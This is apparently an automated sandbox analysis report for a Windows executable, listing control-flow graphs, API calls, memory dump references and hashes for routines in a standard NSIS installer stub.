CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->109 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                                                      • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                                                      • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                                                      • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                                                      • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\9TpV4rfMmJ.exe" ,00000020,"C:\Users\user\Desktop\9TpV4rfMmJ.exe" ,00000000), ref: 004036D6
                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                                                        • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\9TpV4rfMmJ.exe" ,00000000,?), ref: 0040397C
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                                                      • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\9TpV4rfMmJ.exe,0042AA28,00000001), ref: 00403A0E
                                                                                                                      • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                                                      • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                      • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                      • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                      • String ID: "C:\Users\user\Desktop\9TpV4rfMmJ.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\9TpV4rfMmJ.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                      • API String ID: 3859024572-2249088592
                                                                                                                      • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                                                                      • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                                                      • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                                                                      • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 165 4057e4-4057e7 145->165 166 4057c8-4057e2 SendMessageW * 2 145->166 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 169 405917-40591b 154->169 160 4058f8-405904 call 404472 155->160 161 40591e-40592e ShowWindow 155->161 156->154 158 40594a-405950 156->158 158->154 167 405952-405965 SendMessageW 158->167 160->154 163 405930-405939 call 40559f 161->163 164 40593e-40593f call 404472 161->164 163->164 164->156 172 4057f7-40580e call 404499 165->172 173 4057e9-4057f5 SendMessageW 165->173 166->165 174 405a67-405a69 167->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 167->175 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->169 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 185 4059c6-4059dd 181->185 186 405833 182->186 187 405826-405831 ShowWindow 182->187 183->174 184 40586b-405883 SendMessageW * 2 183->184 184->174 188 4059e2-4059fd SendMessageW 185->188 189 405839-40583f call 4044ce 186->189 187->189 188->188 191 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->191 189->183 192 405a24-405a4b SendMessageW 191->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                        • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                                                      • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                                                      • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                      • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                      • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                      • CloseClipboard.USER32 ref: 00405A61
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                      • String ID: {
                                                                                                                      • API String ID: 590372296-366298937
                                                                                                                      • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                      • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                      • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                                                      • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 457 405cc1-405cc2 call 405e58 449->457 458 405cb4-405cbf lstrcatW 449->458 450->447 454 405dba-405dbd 450->454 451->449 451->450 455 405dc7-405dcf call 406873 454->455 456 405dbf-405dc5 454->456 455->447 466 405dd1-405de5 call 405e0c call 405c01 455->466 456->447 460 405cc7-405ccb 457->460 458->460 462 405cd7-405cdd lstrcatW 460->462 463 405ccd-405cd5 460->463 465 405ce2-405cfe lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 470 405d2c-405d40 call 40653d 467->470 471 405d0e-405d16 467->471 468->450 473 405dae 468->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->467 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->468 482->456 487 405dec-405dfb call 40559f call 4062fd 482->487 483->447 484->475 488 405d4c-405d55 call 405c49 484->488 493 405d83-405d86 call 40559f 485->493 494 405d64-405d67 485->494 487->447 488->475 493->475 497 405d69-405d79 call 40559f call 4062fd 494->497 498 405d7b-405d81 494->498 497->475 498->475
                                                                                                                      APIs
                                                                                                                      • DeleteFileW.KERNELBASE(?,?,76083420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                      • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76083420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                      • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,76083420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                      • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                      • API String ID: 2035342205-1953461807
                                                                                                                      • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                      • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                      • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                      • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(76083420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76083420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76083420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                      • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                      • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                      • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 199 403fbe-403fc7 195->199 197 404171-404186 196->197 198 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->198 201 4041c6-4041cb call 4044e5 197->201 202 404188-40418b 197->202 198->197 203 403fc9-403fd6 SetWindowPos 199->203 204 403fdc-403fe3 199->204 218 4041d0-4041eb 201->218 206 40418d-404198 call 401389 202->206 207 4041be-4041c0 202->207 203->204 209 403fe5-403fff ShowWindow 204->209 210 404027-40402d 204->210 206->207 234 40419a-4041b9 SendMessageW 206->234 207->201 217 404466 207->217 211 404100-40410e call 404500 209->211 212 404005-404018 GetWindowLongW 209->212 214 404046-404049 210->214 215 40402f-404041 DestroyWindow 210->215 222 404468-40446f 211->222 212->211 219 40401e-404021 ShowWindow 212->219 223 40404b-404057 SetWindowLongW 214->223 224 40405c-404062 214->224 221 404443-404449 215->221 217->222 227 4041f4-4041fa 218->227 228 4041ed-4041ef call 40140b 218->228 219->210 221->217 230 40444b-404451 221->230 223->222 224->211 233 404068-404077 GetDlgItem 224->233 231 404200-40420b 227->231 232 404424-40443d DestroyWindow EndDialog 227->232 228->227 230->217 236 404453-40445c ShowWindow 230->236 231->232 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 231->237 232->221 238 404096-404099 233->238 239 404079-404090 SendMessageW IsWindowEnabled 233->239 234->222 236->217 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 241 40409b-40409c 238->241 242 40409e-4040a1 238->242 239->217 239->238 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->211 249 4040ea-4040fa SendMessageW 245->249 250 4040ab-4040ad 245->250 246->249 251 4040b6-4040bc 246->251 249->211 250->244 252 4040d3-4040dc call 40140b 251->252 253 4040be-4040c4 call 40140b 251->253 252->211 263 4040de-4040e8 252->263 262 4040ca 253->262 262->244 263->262 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->218 286 404339-40433b 275->286 286->218 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->221 291 40437e-4043ab CreateDialogParamW 288->291 289->217 290 404353-404359 289->290 290->218 292 40435f 290->292 291->221 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->217 293->217 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->221
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                      • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                      • DestroyWindow.USER32 ref: 00404035
                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                      • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                      • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                      • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 121052019-0
                                                                                                                      • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                      • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                      • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                      • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 313 403c72-403c9b call 403ec2 call 405f14 304->313 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->313 319 403ca1-403ca6 313->319 320 403d2d-403d35 call 405f14 313->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 328 403cd6-403cda 321->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 335 403cec-403cf8 lstrlenW 328->335 336 403cdc-403ce9 call 405e39 328->336 343 403df3-403df6 330->343 344 403dfb-403e06 call 403ec2 330->344 332 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->332 333 403eb8 331->333 332->330 341 403eba-403ec1 333->341 337 403d20-403d28 call 405e0c call 40653d 335->337 338 403cfa-403d08 lstrcmpiW 335->338 336->335 337->320 338->337 342 403d0a-403d14 GetFileAttributesW 338->342 347 403d16-403d18 342->347 348 403d1a-403d1b call 405e58 342->348 343->341 354 403e0c-403e26 ShowWindow call 40689a 344->354 355 403e8f-403e90 call 405672 344->355 347->337 347->348 348->337 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->333 361->343 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->343 367->368 371 403e84-403e8d call 403b3c 368->371 371->341
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                        • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                      • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
